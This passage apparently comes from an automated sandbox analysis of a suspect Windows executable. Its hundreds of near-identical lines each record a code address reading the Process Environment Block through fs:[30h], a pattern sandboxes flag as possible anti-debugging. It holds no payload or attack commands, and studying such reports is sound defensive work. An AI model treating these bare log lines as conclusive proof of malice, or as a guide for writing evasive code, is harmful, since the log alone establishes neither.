          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58402 mov eax, dword ptr fs:[00000030h]3_2_00F58402
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F225E0 mov eax, dword ptr fs:[00000030h]3_2_00F225E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F4E5E7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C5ED mov eax, dword ptr fs:[00000030h]3_2_00F5C5ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C5ED mov eax, dword ptr fs:[00000030h]3_2_00F5C5ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F265D0 mov eax, dword ptr fs:[00000030h]3_2_00F265D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F5A5D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F5A5D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E5CF mov eax, dword ptr fs:[00000030h]3_2_00F5E5CF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E5CF mov eax, dword ptr fs:[00000030h]3_2_00F5E5CF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F445B1 mov eax, dword ptr fs:[00000030h]3_2_00F445B1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F445B1 mov eax, dword ptr fs:[00000030h]3_2_00F445B1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA05A7 mov eax, dword ptr fs:[00000030h]3_2_00FA05A7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E59C mov eax, dword ptr fs:[00000030h]3_2_00F5E59C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22582 mov eax, dword ptr fs:[00000030h]3_2_00F22582
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22582 mov ecx, dword ptr fs:[00000030h]3_2_00F22582
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54588 mov eax, dword ptr fs:[00000030h]3_2_00F54588
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5656A mov eax, dword ptr fs:[00000030h]3_2_00F5656A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28550 mov eax, dword ptr fs:[00000030h]3_2_00F28550
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28550 mov eax, dword ptr fs:[00000030h]3_2_00F28550
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30535 mov eax, dword ptr fs:[00000030h]3_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E53E mov eax, dword ptr fs:[00000030h]3_2_00F4E53E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6500 mov eax, dword ptr fs:[00000030h]3_2_00FB6500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF4500 mov eax, dword ptr fs:[00000030h]3_2_00FF4500
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E6F2 mov eax, dword ptr fs:[00000030h]3_2_00F9E6F2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA06F1 mov eax, dword ptr fs:[00000030h]3_2_00FA06F1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA06F1 mov eax, dword ptr fs:[00000030h]3_2_00FA06F1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A6C7 mov ebx, dword ptr fs:[00000030h]3_2_00F5A6C7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A6C7 mov eax, dword ptr fs:[00000030h]3_2_00F5A6C7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F566B0 mov eax, dword ptr fs:[00000030h]3_2_00F566B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C6A6 mov eax, dword ptr fs:[00000030h]3_2_00F5C6A6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24690 mov eax, dword ptr fs:[00000030h]3_2_00F24690
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24690 mov eax, dword ptr fs:[00000030h]3_2_00F24690
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F52674 mov eax, dword ptr fs:[00000030h]3_2_00F52674
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE866E mov eax, dword ptr fs:[00000030h]3_2_00FE866E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE866E mov eax, dword ptr fs:[00000030h]3_2_00FE866E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A660 mov eax, dword ptr fs:[00000030h]3_2_00F5A660
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A660 mov eax, dword ptr fs:[00000030h]3_2_00F5A660
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3C640 mov eax, dword ptr fs:[00000030h]3_2_00F3C640
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E627 mov eax, dword ptr fs:[00000030h]3_2_00F3E627
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F56620 mov eax, dword ptr fs:[00000030h]3_2_00F56620
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F58620 mov eax, dword ptr fs:[00000030h]3_2_00F58620
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2262C mov eax, dword ptr fs:[00000030h]3_2_00F2262C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62619 mov eax, dword ptr fs:[00000030h]3_2_00F62619
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E609 mov eax, dword ptr fs:[00000030h]3_2_00F9E609
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3260B mov eax, dword ptr fs:[00000030h]3_2_00F3260B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F247FB mov eax, dword ptr fs:[00000030h]3_2_00F247FB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F247FB mov eax, dword ptr fs:[00000030h]3_2_00F247FB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F427ED mov eax, dword ptr fs:[00000030h]3_2_00F427ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE7E1 mov eax, dword ptr fs:[00000030h]3_2_00FAE7E1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F2C7C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA07C3 mov eax, dword ptr fs:[00000030h]3_2_00FA07C3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F207AF mov eax, dword ptr fs:[00000030h]3_2_00F207AF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC678E mov eax, dword ptr fs:[00000030h]3_2_00FC678E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F28770 mov eax, dword ptr fs:[00000030h]3_2_00F28770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30770 mov eax, dword ptr fs:[00000030h]3_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20750 mov eax, dword ptr fs:[00000030h]3_2_00F20750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62750 mov eax, dword ptr fs:[00000030h]3_2_00F62750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62750 mov eax, dword ptr fs:[00000030h]3_2_00F62750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE75D mov eax, dword ptr fs:[00000030h]3_2_00FAE75D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA4755 mov eax, dword ptr fs:[00000030h]3_2_00FA4755
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov esi, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov eax, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5674D mov eax, dword ptr fs:[00000030h]3_2_00F5674D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov eax, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov ecx, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5273C mov eax, dword ptr fs:[00000030h]3_2_00F5273C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9C730 mov eax, dword ptr fs:[00000030h]3_2_00F9C730
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C720 mov eax, dword ptr fs:[00000030h]3_2_00F5C720
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C720 mov eax, dword ptr fs:[00000030h]3_2_00F5C720
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20710 mov eax, dword ptr fs:[00000030h]3_2_00F20710
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50710 mov eax, dword ptr fs:[00000030h]3_2_00F50710
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C700 mov eax, dword ptr fs:[00000030h]3_2_00F5C700
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F5C8F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F5C8F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA8E4 mov eax, dword ptr fs:[00000030h]3_2_00FEA8E4
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4E8C0 mov eax, dword ptr fs:[00000030h]3_2_00F4E8C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC89D mov eax, dword ptr fs:[00000030h]3_2_00FAC89D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20887 mov eax, dword ptr fs:[00000030h]3_2_00F20887
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE872 mov eax, dword ptr fs:[00000030h]3_2_00FAE872
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE872 mov eax, dword ptr fs:[00000030h]3_2_00FAE872
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6870 mov eax, dword ptr fs:[00000030h]3_2_00FB6870
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB6870 mov eax, dword ptr fs:[00000030h]3_2_00FB6870
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50854 mov eax, dword ptr fs:[00000030h]3_2_00F50854
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24859 mov eax, dword ptr fs:[00000030h]3_2_00F24859
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F24859 mov eax, dword ptr fs:[00000030h]3_2_00F24859
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F32840 mov ecx, dword ptr fs:[00000030h]3_2_00F32840
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov ecx, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42835 mov eax, dword ptr fs:[00000030h]3_2_00F42835
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5A830 mov eax, dword ptr fs:[00000030h]3_2_00F5A830
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC483A mov eax, dword ptr fs:[00000030h]3_2_00FC483A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC483A mov eax, dword ptr fs:[00000030h]3_2_00FC483A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC810 mov eax, dword ptr fs:[00000030h]3_2_00FAC810
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F529F9 mov eax, dword ptr fs:[00000030h]3_2_00F529F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F529F9 mov eax, dword ptr fs:[00000030h]3_2_00F529F9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAE9E0 mov eax, dword ptr fs:[00000030h]3_2_00FAE9E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F2A9D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F549D0 mov eax, dword ptr fs:[00000030h]3_2_00F549D0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA9D3 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB69C0 mov eax, dword ptr fs:[00000030h]3_2_00FB69C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov esi, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov eax, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA89B3 mov eax, dword ptr fs:[00000030h]3_2_00FA89B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A0 mov eax, dword ptr fs:[00000030h]3_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F209AD mov eax, dword ptr fs:[00000030h]3_2_00F209AD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F209AD mov eax, dword ptr fs:[00000030h]3_2_00F209AD
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4978 mov eax, dword ptr fs:[00000030h]3_2_00FC4978
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC4978 mov eax, dword ptr fs:[00000030h]3_2_00FC4978
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC97C mov eax, dword ptr fs:[00000030h]3_2_00FAC97C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F46962 mov eax, dword ptr fs:[00000030h]3_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov eax, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov edx, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6096E mov eax, dword ptr fs:[00000030h]3_2_00F6096E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA0946 mov eax, dword ptr fs:[00000030h]3_2_00FA0946
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA892A mov eax, dword ptr fs:[00000030h]3_2_00FA892A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB892B mov eax, dword ptr fs:[00000030h]3_2_00FB892B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAC912 mov eax, dword ptr fs:[00000030h]3_2_00FAC912
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18918 mov eax, dword ptr fs:[00000030h]3_2_00F18918
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F18918 mov eax, dword ptr fs:[00000030h]3_2_00F18918
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E908 mov eax, dword ptr fs:[00000030h]3_2_00F9E908
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9E908 mov eax, dword ptr fs:[00000030h]3_2_00F9E908
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5AAEE mov eax, dword ptr fs:[00000030h]3_2_00F5AAEE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5AAEE mov eax, dword ptr fs:[00000030h]3_2_00F5AAEE
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20AD0 mov eax, dword ptr fs:[00000030h]3_2_00F20AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54AD0 mov eax, dword ptr fs:[00000030h]3_2_00F54AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F54AD0 mov eax, dword ptr fs:[00000030h]3_2_00F54AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F76ACC mov eax, dword ptr fs:[00000030h]3_2_00F76ACC
